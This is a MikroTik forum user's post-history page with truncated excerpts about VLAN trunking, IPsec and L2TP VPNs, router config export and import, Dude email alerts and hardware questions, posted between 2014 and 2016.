Anyone else having this VPN issue?

Seems like ever since we upgarded to 6.39.2 we have had an issue with VPN about once a week. It is strange, it still shows our IPSEC tunnels established and connected however they will not pass any traffic. L2TP tunnels simply wont established. There is nothing showing in the log files either. I hav...
by 43north
Sun Aug 14, 2016 2:42 am
Forum: The Dude
Topic: Easy email notifications in The Dude! No other 3rd party stuff needed!
Replies: 1
Views: 1657

Easy email notifications in The Dude! No other 3rd party stuff needed!

I thought I should share I have found a solution for email notifications DIRECTLY through The Dude without any other junk.... If you have a Gmail account then enter this SMTP server in the dude for the primary SMTP.... aspmx.l.google.com (you will have to resolve it to an ip address to input into du...
by 43north
Sun Aug 14, 2016 2:39 am
Forum: The Dude
Topic: dude email setup
Replies: 2
Views: 2337

Re: dude email setup

I thought I should update this thread as I have found a solution for email notifications DIRECTLY through The Dude without any other junk.... If you have a Gmail account then enter this SMTP server in the dude for primary SMTP.... aspmx.l.google.com (you will have to resolve it to an ip address to i...
by 43north
Sun Aug 14, 2016 2:39 am
Forum: The Dude
Topic: how to create notification to mail the dude?
Replies: 14
Views: 14419

Re: how to create notification to mail the dude?

I thought I should update this thread as I have found a solution for email notifications DIRECTLY through The Dude without any other junk.... If you have a Gmail account then enter this SMTP server in the dude for primary SMTP.... aspmx.l.google.com (you will have to resolve it to an ip address to i...
by 43north
Sun Aug 14, 2016 2:38 am
Forum: The Dude
Topic: Dude - Email notifications through Gmail on Windows - via mailsend
Replies: 37
Views: 31126

Re: Dude - Email notification through Gmail on Windows - via mailsend.

I thought I should update this thread as I have found a solution for email notifications DIRECTLY through The Dude without any other junk.... If you have a Gmail account then enter this SMTP server in the dude for primary SMTP.... aspmx.l.google.com (you will have to resolve it to an ip address to i...
by 43north
Tue Jul 26, 2016 9:21 am
Forum: Scripting
Topic: Blacklist Filter update script
Replies: 632
Views: 212296

Re: Blacklist Filter update script

Would love to but have to get to bed. Why is there no private messaging anymore? Or is it just my account?
by 43north
Tue Jul 26, 2016 9:04 am
Forum: Scripting
Topic: Blacklist Filter update script
Replies: 632
Views: 212296

Re: Blacklist Filter update script

Bah! Been using your stuff for over a year and love it. Problems lately now....    MMM      MMM       KKK                          TTTTTTTTTTT      KKK   MMMM    MMMM       KKK                          TTTTTTTTTTT      KKK   MMM MMMM MMM  III  KKK  KKK  RRRRRR     OOOOOO      TTT     III  KKK  KKK  ...
by 43north
Tue Jul 26, 2016 8:57 am
Forum: Scripting
Topic: Blacklist Filter update script
Replies: 632
Views: 212296

Re: Blacklist Filter update script

LOL okay went to the very first post you started this thread and copied and pasted it all.... Still get an error.... EDIT: I also tried this in the script file, no dice  MMM      MMM       KKK                          TTTTTTTTTTT      KKK   MMMM    MMMM       KKK                          TTTTTTTTTTT...
by 43north
Tue Jul 26, 2016 8:49 am
Forum: Scripting
Topic: Blacklist Filter update script
Replies: 632
Views: 212296

Re: Blacklist Filter update script

                                                                                                                                                                                                                                                                 MMM      MMM       KKK                     ...
by 43north
Tue Jul 26, 2016 8:37 am
Forum: Scripting
Topic: Blacklist Filter update script
Replies: 632
Views: 212296

Re: Blacklist Filter update script

Still nothing.Shows in the log file that it is going but that is it, no errors or anything just nothing. Strange.
by 43north
Tue Jul 26, 2016 8:16 am
Forum: Scripting
Topic: Blacklist Filter update script
Replies: 632
Views: 212296

Re: Blacklist Filter update script

I copied and pasted your recent code but I can not get it to work.... Tried it on two different CCR routers. One running 6.36 and the other running 6.35.2. It does not give an error it just doesn't do anything.....
by 43north
Fri Oct 09, 2015 11:42 pm
Forum: General
Topic: RB2011 Routing speed
Replies: 13
Views: 9981

Re: RB2011 Routing speed

Holy crap I guess nevermind on my last post. I just found this feed and it fixed the problem! Disabled the LCD and boom! Weird!!

http://forum.mikrotik.com/viewtopic.php?t=93553
by 43north
Fri Oct 09, 2015 11:35 pm
Forum: General
Topic: RB2011 Routing speed
Replies: 13
Views: 9981

Re: RB2011 Routing speed

I am having the exact same problem as the OP with my RB2011. Did you find a solution to why you were only getting 50mbps?
by 43north
Fri Oct 09, 2015 8:18 am
Forum: Scripting
Topic: Blacklist Filter update script
Replies: 632
Views: 212296

Re: Blacklist Filter update script

This is awesome! Thanks!!
by 43north
Fri Oct 09, 2015 7:59 am
Forum: General
Topic: What are some good publicly available blacklists?
Replies: 1
Views: 651

What are some good publicly available blacklists?

I am looking for any publicly available IP blacklists. Lists of addresses that I can copy and paste into an address list and then add a firewall rule to it.
Thanks!
by 43north
Sun Sep 06, 2015 6:52 pm
Forum: Beginner Basics
Topic: Update: Resolved! RB951Ui-2HnD - Quick Set to HomeAP - Simple Queue not working for wireless clients?
Replies: 10
Views: 3670

Re: RB951Ui-2HnD - Quick Set to HomeAP - Simple Queue not working for wireless clients?

Are you setting a destination address in the queue? 0.0.0.0/0?

I never use the web interface, only Winbox. When I set these up for clients just like you are doing it works just fine without winbox running....
by 43north
Sat Aug 29, 2015 3:08 am
Forum: General
Topic: bandwith control
Replies: 3
Views: 1123

Re: bandwith control

Mine seems to work even if Winbox is not running.... Did you find anything else out on this?
by 43north
Sat Aug 29, 2015 2:34 am
Forum: General
Topic: Clarify Simple Queues question on bandwidth limit
Replies: 0
Views: 627

Clarify Simple Queues question on bandwidth limit

So I understand how to setup a Simple Queues to limit bandwidth. Just confirm for me that this only limits WAN internet speed and not normal LAN traffic transfer rates?
by 43north
Thu Jul 02, 2015 8:18 am
Forum: RouterBOARD hardware
Topic: CCR1072 Availability
Replies: 29
Views: 20188

Re: CCR1072 Availability

tik.JPG
by 43north
Thu Jul 02, 2015 8:17 am
Forum: RouterBOARD hardware
Topic: CCR-1072 release date?
Replies: 71
Views: 20145

Re: CCR-1072 release date?

tik.JPG
by 43north
Mon Jun 15, 2015 1:44 am
Forum: Beginner Basics
Topic: Basic must have firewall settings?
Replies: 4
Views: 3337

Basic must have firewall settings?

Just looking for a list of standard firewall settings that are general best practice rules. Such a list exist?
by 43north
Sun May 31, 2015 2:51 am
Forum: Beginner Basics
Topic: Simple Bridge question....
Replies: 1
Views: 982

Re: Simple Bridge question....

I am an idiot.... All I had to do was assign the VLAN interfaces to the bridge rather than the physical port. Once I did that all is well!!!
by 43north
Sat May 30, 2015 7:37 am
Forum: Beginner Basics
Topic: Simple Bridge question....
Replies: 1
Views: 982

Simple Bridge question....

I am really struggling with something that I believe is probably pretty simple..... I simply want SFP12 to be a slave of sfpplus1 as highlighted in the screen shot. My guess is build a bridge but it simply won't work. There is a switch attached to SFP12 port and when I simply bridge SFP12 with sfppl...
by 43north
Sat May 16, 2015 6:46 pm
Forum: Forwarding Protocols
Topic: VLANs over UBNT Wireless Link
Replies: 7
Views: 10672

Re: VLANs over UBNT Wireless Link

I messed with this last night on the bench. Once I wrapped my head around the VLAN config on the Ubiquiti wireless devices it was easy. Also the interesting thing I found on the Ubiquiti stuff was that if you have a trunk switch on each end of the Ubiquiti wireless devices then you don't have to do ...
by 43north
Thu May 14, 2015 6:40 am
Forum: Beginner Basics
Topic: VPN Newbie question
Replies: 4
Views: 1333

Re: VPN Newbie question

Well that was the video I was going to point you towards. I have watched all of his videos and read his material. I have been able to get everything working first time around just following his stuff..... not sure what the hiccup is...
by 43north
Tue May 12, 2015 8:02 am
Forum: Beginner Basics
Topic: VPN Newbie question
Replies: 4
Views: 1333

Re: VPN Newbie question

Just configure a L2TP on your Tik. Some good how tos out there for it. No need to port forward.
by 43north
Fri May 01, 2015 8:41 pm
Forum: Beginner Basics
Topic: VLAN based DHCP
Replies: 4
Views: 2283

Re: VLAN based DHCP

Agreed, in your address list you have the addresses attached to bridge interfaces rather than the VLAN or port specifically.
by 43north
Fri May 01, 2015 8:32 pm
Forum: Beginner Basics
Topic: Need some help with this config.
Replies: 2
Views: 1249

Re: Need some help with this config.

So from the Tik can you use the ping tool and hit 8.8.8.8 from the router?

Also why is there a Static route in your routing table for 0.0.0.0 when there is already a dynamic route for it?
by 43north
Fri May 01, 2015 8:22 pm
Forum: Beginner Basics
Topic: Another help me with L2TP/IPSEC proxy-arp...
Replies: 11
Views: 6699

Re: Another help me with L2TP/IPSEC proxy-arp...

Can you give an example of what you are trying to access when you say web interfaces? If you are on an L2TP tunnel you should be able to access other LAN devices....
by 43north
Fri May 01, 2015 7:00 am
Forum: General
Topic: How to run OSPF and VRRP together?
Replies: 0
Views: 725

How to run OSPF and VRRP together?

If I have multiple routers what is the best way to implement VRRP and OSPF together?
by 43north
Fri May 01, 2015 12:15 am
Forum: General
Topic: DHCP with multiple routers running OSPF?
Replies: 0
Views: 674

DHCP with multiple routers running OSPF?

I understand how to setup OSPF on multiple routers for fail over if one goes down. My question is that if you have a router that is acting as a DHCP server and that router goes down, how do the other routers pick up the DHCP role? Do you setup your DHCP server on each router? Seems like that would b...
by 43north
Thu Apr 30, 2015 6:17 am
Forum: RouterBOARD hardware
Topic: CCR-1072 release date?
Replies: 71
Views: 20145

Re: CCR-1072 release date?

Thanks for the update! Sounds like it will be worth the wait!!!
by 43north
Tue Apr 28, 2015 8:57 am
Forum: RouterBOARD hardware
Topic: CCR-1072 release date?
Replies: 71
Views: 20145

Re: CCR-1072 release date?

Agreed, +1 on release time frame
by 43north
Mon Apr 27, 2015 8:04 am
Forum: Forwarding Protocols
Topic: VLANs over UBNT Wireless Link
Replies: 7
Views: 10672

Re: VLANs over UBNT Wireless Link

Can you post up your results?
by 43north
Mon Apr 27, 2015 8:03 am
Forum: Forwarding Protocols
Topic: Load balance 2 ISP connected to 2 different routers at different physical location (same network)
Replies: 4
Views: 1619

Re: Load balance 2 ISP connected to 2 different routers at different physical location (same network)

I believe by default each gateway should take care of it's own clients that are connected to that router. I am not entirely sure but if you implement OSPF and then use the check gateway ping that it may failover to one or the other gateway if one goes down..... Not entirely sure. I will soon have a ...
by 43north
Sun Apr 19, 2015 6:30 am
Forum: General
Topic: Quickest firewall rule to block multiple LAN traffic?
Replies: 5
Views: 1682

Quickest firewall rule to block multiple LAN traffic?

So I have several different LANs setup on my Tik. If I do not want any of the LANs to see each what is the quickest Firewall rule to make this happen?
by 43north
Sat Mar 21, 2015 7:20 pm
Forum: RouterBOARD hardware
Topic: CCR-1072 release date?
Replies: 71
Views: 20145

Re: CCR-1072 release date?

What is the hold up on the release of the 1072?
by 43north
Sun Mar 15, 2015 3:59 am
Forum: General
Topic: Are either of these diagrams okay? Opinions?
Replies: 1
Views: 994

Are either of these diagrams okay? Opinions?

To keep it simple.... The middle router is central hub. Each line represents a direct fiber optic connection. Each of the outside routers is a different building and a different subnet. My question.... Diagram 1 utilizes routers at each spoke, diagram 2 uses layer 2 fiber capable switches at each sp...
by 43north
Sat Jan 31, 2015 8:08 am
Forum: General
Topic: CCR 1016 12s - SFP link lights
Replies: 4
Views: 2331

Re: CCR 1016 12s - SFP link lights

How funny! I have this same router and it is doing the same thing!! I also took a picture of it today to post and ask WTF? I guess I will just jump onto this thread and hope for an answer.
by 43north
Sat Jan 31, 2015 7:53 am
Forum: Beginner Basics
Topic: Step Up from the RB2011....?
Replies: 22
Views: 7709

Re: Step Up from the RB2011....?

The CCR1009 is a nice router. We use one as a backup to our CCR1016 at work. It is a nice step up to a multicore processor and more RAM. It is what I will be replacing my home RB2011 with someday.
by 43north
Tue Jan 27, 2015 6:07 am
Forum: General
Topic: Utilizing VLANs on CRS125 using the switch chip with Unifi
Replies: 3
Views: 1461

Re: Utilizing VLANs on CRS125 using the switch chip with Un

You are correct, a bridge may be in order....
by 43north
Tue Jan 27, 2015 6:05 am
Forum: Beginner Basics
Topic: mikrotik VLANS and tagged ports
Replies: 5
Views: 2489

Re: mikrotik VLANS and tagged ports

I believe VLANS are quite easy on Tiks..... Maybe I am not clear on what you are asking.....

In my picture you can see that I have one physical ethernet ports and three different VLANs running on it. Is this what you are after?
by 43north
Mon Jan 26, 2015 5:50 am
Forum: RouterBOARD hardware
Topic: CCR-1072 release date?
Replies: 71
Views: 20145

Re: CCR-1072 release date?

Any price point ideas yet?
by 43north
Mon Jan 26, 2015 5:47 am
Forum: Beginner Basics
Topic: Newbie routing question.
Replies: 1
Views: 1057

Re: Newbie routing question.

Check out some of Greg Sowell's videos on YouTube and you should be able to find a good how to for this
by 43north
Mon Jan 26, 2015 5:44 am
Forum: Beginner Basics
Topic: Uber newbie questions
Replies: 2
Views: 1362

Re: Uber newbie questions

Dude you are just going to have to do some Googling to learn the Tiks. It is not a huge deal for what you want to do. Greg Sowell has an awesome Youtube channel of tutorial videos. Check them out.
by 43north
Mon Jan 26, 2015 5:42 am
Forum: Beginner Basics
Topic: how to block traffic
Replies: 8
Views: 2310

Re: how to block traffic

Just create a firewall rule. Google Mikrotik IP firewall rules and you should find some tutorials.
by 43north
Mon Jan 26, 2015 5:39 am
Forum: Beginner Basics
Topic: mikrotik VLANS and tagged ports
Replies: 5
Views: 2489

Re: mikrotik VLANS and tagged ports

Can't you just set them up like this?
Capture.JPG
by 43north
Mon Jan 26, 2015 5:29 am
Forum: General
Topic: Utilizing VLANs on CRS125 using the switch chip with Unifi
Replies: 3
Views: 1461

Re: Utilizing VLANs on CRS125 using the switch chip with Un

I don't know that you can specifically tag VLAN traffic on MikroTiks..... I assume you have your VLAN setup in the Unifi controller? I would create your guest VLAN on the Tik with its own subnet and pool of addresses. If the UAP ports are set to master port 3 it should work. If not then you need to ...
by 43north
Thu Jan 22, 2015 6:10 am
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 35
Views: 17997

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

@RackKing are you freakn kidding me!!!??? I think you even mentioned spanning tree when we were on the work session since others had mentioned it on the forum didn't you? What is interesting to me is that we proved the Tik worked fine when not using bridges so the issue with RSTP is unique to using ...
by 43north
Wed Jan 21, 2015 2:25 am
Forum: General
Topic: Anyone used fiber between Ubiquiti and MikroTik?
Replies: 6
Views: 3184

Re: Anyone used fiber between Ubiquiti and MikroTik?

Hmmmmm interesting. Have you posted over on the Ubiquiti forum about this? This will be problematic for me for an upcoming project if this is a widespread issue with the Edgeswitches.
by 43north
Sun Jan 18, 2015 9:34 am
Forum: General
Topic: Anyone used fiber between Ubiquiti and MikroTik?
Replies: 6
Views: 3184

Re: Anyone used fiber between Ubiquiti and MikroTik?

To clarify.... you are having trouble running multiple SFP ports simultaneously on the Edgeswitch?
by 43north
Sun Jan 18, 2015 4:19 am
Forum: General
Topic: Anyone used fiber between Ubiquiti and MikroTik?
Replies: 6
Views: 3184

Re: Anyone used fiber between Ubiquiti and MikroTik?

Found the solution! The key is the disable Auto Negotiation on the MikroTik SFP interface and it linked right up!!
by 43north
Sun Jan 18, 2015 3:06 am
Forum: General
Topic: Anyone used fiber between Ubiquiti and MikroTik?
Replies: 6
Views: 3184

Anyone used fiber between Ubiquiti and MikroTik?

I have a Ubiquiti Edgeswitch 24 port and have one of the fiber ports connected to a fiber port on my MikroTik router. It is like it recognizes the connection however no traffic flow and the MikroTik action link is off. Weird thing is that this same MikroTik worked great with the fiber port on my old...
by 43north
Sat Jan 10, 2015 7:35 pm
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 35
Views: 17997

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

Here is my Edgeswitch settings. Very basic and straight forward. Trunk port set on port 1, port 2 is UAP port. You can see VLANS attached accordingly..... This is working great for me now. If this doesn't work then possibly some Tik settings? I did not do any other configs on the switch, left PVID a...
by 43north
Sat Jan 10, 2015 7:08 am
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 35
Views: 17997

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

Okay I have mine working!!! There was a thread this week on the Ubiquiti forum about this same problem. Looks like they rolled out a new Alpha firmware yesterday that now includes a VLAN wizard. It is muuuuch easier to configure the VLANs now and it is working great for me now! Here is a link to tha...
by 43north
Fri Jan 09, 2015 7:16 am
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 35
Views: 17997

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

That is very strange. I am testing your setup and I to am running into the same problem as you with the VLAN..... very strange when connected to the Unifi AP. I have posted in Ubiquiti forum, will see if we get a response. I believe the setup is exactly how it should be, may be a software issue with...
by 43north
Thu Jan 08, 2015 12:43 am
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 35
Views: 17997

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

Exactly!! Thanks Nathan for explaining more gracefully than I was. Great way to present it that the Unifi's are another trunk line and the wifi is essentially the access port. Hope Racking can get it lined out from here.
by 43north
Wed Jan 07, 2015 3:55 pm
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 35
Views: 17997

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

AHHHH! If you are connecting Unifi Access Points with VLANs those must be TAGGED!!! Switch all your UAPs to TAGGED and you should be in business! So to clarify..... Your trunk ports sound great. Also any access ports should be UNTAGGED but your UNIFI ports need to be TAGGED. Leave the PVID alone on ...
by 43north
Wed Jan 07, 2015 5:45 am
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 35
Views: 17997

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

Okay you can not have an access port with more than one VLAN. Only your trunk ports are passing multiple VLANS between switches and routers. Your access port is your "final destination" for a specific VLAN but you can only run one untagged VLAN per access port. What is the problem or error...
by 43north
Tue Jan 06, 2015 8:09 am
Forum: General
Topic: IPSec VPN between Cisco and Mikrotik
Replies: 2
Views: 1168

Re: IPSec VPN between Cisco and Mikrotik

Don't think you can have the same LAN subnet on both ends....
by 43north
Tue Jan 06, 2015 5:51 am
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 35
Views: 17997

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

PVID on the access port needs to match whichever VLAN you want running through that access port. Make sense?
by 43north
Mon Jan 05, 2015 10:11 pm
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 35
Views: 17997

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

On your VLAN ports.... not only are you setting the specific VLAN number to untagged are you also EXCLUDING all other VLANs etc off of that access port? Access port is simply the switch port that connects to an end client (ie desktop, laptop, access point, printer etc.)
by 43north
Thu Jan 01, 2015 6:58 am
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 35
Views: 17997

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

NathanA hit the nail on the head with his explanation of the access port config on the Edgeswitch. Shoot me an email to get my Edgeswitch guide....
by 43north
Thu Dec 25, 2014 10:15 pm
Forum: General
Topic: Ditch ubiquiti and come to mikrotik?
Replies: 39
Views: 10949

Re: Ditch ubiquiti and come to mikrotik?

I understand from reading on the Ubiquiti forums that heat is an issue with those AC units. I have deployed a mixture of indoor and outdoor regular Unifi units and love them. Also I actually really like the software platform as well. I have found that have a Mikrotik router base and then ubiquiti sw...
by 43north
Wed Dec 24, 2014 8:02 am
Forum: General
Topic: Ditch ubiquiti and come to mikrotik?
Replies: 39
Views: 10949

Re: Ditch ubiquiti and come to mikrotik?

Personally I am a huge Ubiquiti fan...... except for their routers..... Definitely have chosen MikroTik routers over theirs. I still however love their switches, Unifi, and Video products.
by 43north
Mon Dec 22, 2014 7:11 am
Forum: General
Topic: Hub and Spoke IPSEC Configuration
Replies: 7
Views: 6204

Re: Hub and Spoke IPSEC Configuration

Would setting the branch offices up with an L2TP tunnel back to the main office be an easy way to configure this? I may be wrong but thought I would throw that out there.
by 43north
Mon Dec 22, 2014 6:53 am
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 35
Views: 17997

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

Yes in fact I created a step by step guide for this specific hardware pairing..... email me at mike(at)43index.com and I will forward you the Word document. I had no problems getting it setup and working just as you are describing. You don't need to tag the VLAN on the Mikrotik end, only on the Edge...
by 43north
Mon Dec 15, 2014 6:55 am
Forum: General
Topic: Best way to stay on top of new and upcoming products?
Replies: 6
Views: 2126

Re: Best way to stay on top of new and upcoming products?

So they follow the Ubiquiti release time frames then huh? LOL
by 43north
Sun Dec 14, 2014 9:51 am
Forum: General
Topic: Tunneling and Routing
Replies: 1
Views: 1307

Re: Tunneling and Routing

I would just establish an IPSEC tunnel between the two routers. I have one setup with cable internet and it works great.
by 43north
Sun Dec 14, 2014 9:46 am
Forum: General
Topic: IPSec succeeds but L2TP fails to establish - client lonely
Replies: 13
Views: 12635

Re: IPSec succeeds but L2TP fails to establish - client lone

What is the error that is showing in the log when you are trying to connect to the L2TP tunnel?
by 43north
Sun Dec 14, 2014 1:58 am
Forum: Announcements
Topic: Newsletter 62
Replies: 30
Views: 31621

Re: Newsletter 62

Any idea of a price point for the CCR1072??
by 43north
Sun Dec 14, 2014 1:53 am
Forum: General
Topic: Best way to stay on top of new and upcoming products?
Replies: 6
Views: 2126

Re: Best way to stay on top of new and upcoming products?

So I went through the slide show and saw the CCR1072 router that is exactly what I am looking for! It says November for release..... any ideas when this will hit the market?
by 43north
Sun Dec 14, 2014 1:51 am
Forum: General
Topic: Can you run an SFP module and cable in an SFP+ port?
Replies: 1
Views: 1296

Can you run an SFP module and cable in an SFP+ port?

So if I have some open SFP+ ports on my router or switch are they backwards compatible to use just regular SFP modules and cables to run just an SFP cable if I wanted to? I ask because obviously single mode SFP cable is cheaper than the 10g stuff for longer runs that I would like to make.
by 43north
Sat Dec 13, 2014 9:04 am
Forum: General
Topic: Best way to stay on top of new and upcoming products?
Replies: 6
Views: 2126

Best way to stay on top of new and upcoming products?

Is there a place to get information about new hardware that Mikrotik will be rolling out in the near future??
by 43north
Thu Dec 11, 2014 6:05 am
Forum: General
Topic: VPN site-to-site IPSec tunnel
Replies: 11
Views: 3537

Re: VPN site-to-site IPSec tunnel

Sure it can but if your address changes you will have to update the tunnel config on both sides with the new IP. This is where services like no-ip.com come in really handy, then you don't have to update the routers. Just go to the website and update the DNS.
by 43north
Thu Dec 04, 2014 5:49 am
Forum: Beginner Basics
Topic: Need help to setup VPN between two sites
Replies: 7
Views: 3299

Re: Need help to setup VPN between two sites

I went the free route to take care of this issue for me. Check out no-ip.com and get yourself a free DNS associated with your dynamic IPs.
Exactly what I use and works awesome.
by 43north
Wed Dec 03, 2014 7:46 am
Forum: General
Topic: VPN site-to-site IPSec tunnel
Replies: 11
Views: 3537

Re: VPN site-to-site IPSec tunnel

I would always use IPSEC over PPTP as it is more secure....
by 43north
Tue Dec 02, 2014 7:29 am
Forum: General
Topic: VPN site-to-site IPSec tunnel
Replies: 11
Views: 3537

Re: VPN site-to-site IPSec tunnel

I can do a Join.me session with you tomorrow night around 9pm Mountain Time if you want. Should be able to get it figured out pretty quick. Email me at mike(at)43index.com if you want to set something up.
by 43north
Mon Dec 01, 2014 5:56 am
Forum: General
Topic: How to copy settings from one MikroTik to another?
Replies: 20
Views: 38900

Re: How to copy settings from one MikroTik to another?

Use the tools in notepad. Failure at line 18 Open RSC file and use the goto command and look at what that line does. I have a rsc file I use on 750GLs so a tech can walk out the door and plug them in on site. First try importing the script in terminal. You will see EXACTLY WHAT THE ERRORS ARE. Then...
by 43north
Mon Dec 01, 2014 5:28 am
Forum: General
Topic: How to copy settings from one MikroTik to another?
Replies: 20
Views: 38900

Re: How to copy settings from one MikroTik to another?

Buddy, If you have things configured on port 6-10 on ur RB 2011 how do you expect to find them on RB 750. Also RB 750 has no wireless. Change those setting and your export import will work good. I did that with the wireless and got past that error no problem. I also deleted all the ports after port...
by 43north
Mon Dec 01, 2014 3:33 am
Forum: General
Topic: How to copy settings from one MikroTik to another?
Replies: 20
Views: 38900

Re: How to copy settings from one MikroTik to another?

You guys left out the step of removing default entries where you are importing. That is why that failed. Why does it not work when I select to restore to factory default and then check the box that says "no default configuration" and then to run the script file does it not work? It seems ...
by 43north
Mon Dec 01, 2014 3:06 am
Forum: General
Topic: How to copy settings from one MikroTik to another?
Replies: 20
Views: 38900

Re: How to copy settings from one MikroTik to another?

You are correct, that was that error. Once I fixed that it went to another error and I fixed that as well. I would need to spend some time tweaking the RSC file as it is errors because of the hardware differences between the two different routers I am experimenting with.... For example one is a 5 po...
by 43north
Mon Dec 01, 2014 12:05 am
Forum: General
Topic: How to copy settings from one MikroTik to another?
Replies: 20
Views: 38900

Re: How to copy settings from one MikroTik to another?

Here is the first chunk of the export script..... What is line 21? # nov/29/2014 15:01:17 by RouterOS 6.22 # software id = N17S-NLH4 # /interface ethernet set [ find default-name=ether1 ] name="ether1- WAN gateway" set [ find default-name=ether2 ] name="ether2 LAN" set [ find def...
by 43north
Sun Nov 30, 2014 11:38 pm
Forum: General
Topic: How to copy settings from one MikroTik to another?
Replies: 20
Views: 38900

Re: How to copy settings from one MikroTik to another?

I am at a loss then..... both Tiks are running V6.22
by 43north
Sun Nov 30, 2014 11:19 pm
Forum: General
Topic: How to copy settings from one MikroTik to another?
Replies: 20
Views: 38900

Re: How to copy settings from one MikroTik to another?

Ran the compact export from my RB2011 and tried to import it into my RB750, still get the same error. I don't know how to read the script as far as figuring out what (line 21 column 26) is referring to. Do I literally just count down the rows from where the script starts to row 21 and then over 26 c...
by 43north
Sun Nov 30, 2014 10:48 pm
Forum: General
Topic: How to copy settings from one MikroTik to another?
Replies: 20
Views: 38900

Re: How to copy settings from one MikroTik to another?

I saw your response to removing the default config..... Is there an easy way to do that without going line by line through the script?
by 43north
Sun Nov 30, 2014 9:09 pm
Forum: General
Topic: How to copy settings from one MikroTik to another?
Replies: 20
Views: 38900

Re: How to copy settings from one MikroTik to another?

Follow up question..... does the export and import functions have to be the same model of router to work?

I created an export file from my RB2011 and then tried to import the file into my RB750 this is what I got from the terminal....
expected end of command (line 21 column 26)
by 43north
Sun Nov 30, 2014 9:02 pm
Forum: General
Topic: hot backup
Replies: 2
Views: 1513

Re: hot backup

Did this work to restore a backup of your config to a different router?
by 43north
Sun Nov 30, 2014 8:59 pm
Forum: General
Topic: Mass configuration
Replies: 18
Views: 8802

Re: Mass configuration

So did you ever get this working to mass configure all your routers?
by 43north
Sun Nov 30, 2014 8:29 pm
Forum: General
Topic: How to copy settings from one MikroTik to another?
Replies: 20
Views: 38900

How to copy settings from one MikroTik to another?

I was wondering if it is possible to backup all of my settings on one MikroTik and then restore then to a different MikroTik so that I don't have to reprogram everything?

Can you do this with an identical MikroTik? Can you do this with different models of MikroTiks?
by 43north
Sun Nov 30, 2014 9:43 am
Forum: General
Topic: (Another) Dual WAN Setup Help
Replies: 2
Views: 1447

Re: (Another) Dual WAN Setup Help

Tag as I am curious also.
by 43north
Sun Nov 30, 2014 9:40 am
Forum: General
Topic: Multiple vlan trunk from CCR
Replies: 1
Views: 1358

Re: Multiple vlan trunk from CCR

Yes totally possible. I can probably help you but need to see it in Winbox to wrap my head around it. So confirming you have all your VLANS on a single ethernet interface (Say port 2 for example)? Then you should be able to create a bridge and in that bridge have all the VLANS you want and then say ...
by 43north
Tue Nov 25, 2014 8:50 am
Forum: Beginner Basics
Topic: Dynamic IP Address from ISP
Replies: 13
Views: 3896

Re: Dynamic IP Address from ISP

Hmmm this is interesting and I am not sure but curious if someone else chimes in. My thought is that your modem is not truely in bridge mode since you are pulling a 10. private subnet for your WAN? Could be totally fine depending on how your ISP is doing their address hand outs.
by 43north
Tue Nov 25, 2014 8:47 am
Forum: Beginner Basics
Topic: Bind VPN to a specific ethernet port (Ether1)
Replies: 4
Views: 3735

Re: Bind VPN to a specific ethernet port (Ether1)

In my mind you would accomplish both things by simply putting the VOIP phone and respect port on it's own VLAN. Then you can isolate traffic just to that subnet. Then just establish your IPSEC VPN tunnel to link to that subnet only. Should be easy peasy.
by 43north
Tue Nov 25, 2014 8:42 am
Forum: General
Topic: RB750GL VPN Gateway
Replies: 2
Views: 2088

Re: RB750GL VPN Gateway

I am not clear on what you mean by VPN gateway,,,,, The way you describe clients connected on your LAN are you just asking if the MikroTik will act as a firewall from the outside internet world?
by 43north
Tue Nov 25, 2014 8:36 am
Forum: General
Topic: PPTP and L2TP/IPSec are NOT secure. Use OpenVPN.
Replies: 8
Views: 5442

Re: PPTP and L2TP/IPSec are NOT secure. Use OpenVPN.

Want 100% security? Don't have any VPNs and unplug your LAN from the internet....
by 43north
Tue Nov 25, 2014 8:26 am
Forum: General
Topic: IP Camera Subnet
Replies: 36
Views: 10185

Re: IP Camera Subnet

Ugh this is getting crazy. If you put them on two different subnets then yes maybe not all the traffic flows through the router but that is if you have a layer two switch. But guess what...... the moment you bring up those cameras on your main LAN your router has to route the traffic! Ok screen shot...
by 43north
Mon Nov 24, 2014 5:33 pm
Forum: General
Topic: IP Camera Subnet
Replies: 36
Views: 10185

Re: IP Camera Subnet

Here is what you need to do...... Setup your router along with all the devices. Put them all on the same subnet. Then start generating as much traffic as you can. While you are doing this log into your router and then click on the System->Resources tab and check your routers CPU load as well as traf...
by 43north
Mon Nov 24, 2014 4:04 am
Forum: General
Topic: IP Camera Subnet
Replies: 36
Views: 10185

Re: IP Camera Subnet

He is saying that even if they are on separate subnets the router still has to route all the traffic no matter what subnet(s) the traffic is on. At the end of the day for your specific setup I don't believe you will notice any performance difference no matter how you decide to set it up. You just si...
by 43north
Sat Nov 22, 2014 6:55 pm
Forum: General
Topic: VLAN interface as a slave of physical Interface
Replies: 8
Views: 5743

